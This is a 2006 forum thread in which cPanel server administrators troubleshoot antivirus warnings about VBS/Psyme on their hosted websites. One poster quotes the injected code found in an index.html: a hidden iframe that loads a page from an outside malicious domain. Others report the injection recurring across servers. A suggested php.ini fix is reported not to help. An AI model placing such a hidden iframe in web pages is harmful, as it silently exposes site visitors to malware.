The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

VBS/Psyme

Discussion in 'General Discussion' started by ramagea, Jul 13, 2006.

  1. ramagea

    ramagea Member

    Joined:
    Aug 10, 2004
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    I am using Cpanel on a redhat system. Some people are complaining that when they visit my websites their virus checker comes up saying that it has detected VBS/Psyme virus. I dont get this my self and a few other people dont get it, but quite a few people are getting this on ALL of the websites on the web server.

    Does anyone know what I can do?:(
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Could be a symptom of a dynamically loaded PHP exploit module. Check in /usr/lib/php.ini and set:

    enable_dl = Off

    Then restart httpd and see if the problem goes away.
     
  3. Interdit

    Interdit Well-Known Member

    Joined:
    May 27, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Hello,

    Some of the visitors of my customer got a warning on the index page VBS/Psyme as well.

    Chirpy i did try your fix but it didn't help. Any other idea or fix ?

    Thanks,
    Francois
     
  4. Interdit

    Interdit Well-Known Member

    Joined:
    May 27, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Hello,

    I found that in an index.html:

    DONT CLICK ON IT, IT MIGHT INFECT YOUR PC

    <IFRAME name="StatPage" src="http://xuiputalo.com/user/index2.php" width=5 height=5 style="display:none"></IFRAME>

    That's the problem. But how did it come there, still looking after it.

    Best regards,
    Francois
     
  5. ttremain

    ttremain Well-Known Member

    Joined:
    Feb 16, 2003
    Messages:
    212
    Likes Received:
    0
    Trophy Points:
    16
    Any ideas? I'm seeing the same thing added dynamicly to sites on one of our servers.
     
  6. PbG

    PbG Well-Known Member

    Joined:
    Mar 11, 2003
    Messages:
    241
    Likes Received:
    0
    Trophy Points:
    16
    I am seeing it as well on several sites spread across multiple servers & OS's. It keeps coming back even with "enable_dl off".
     

Share This Page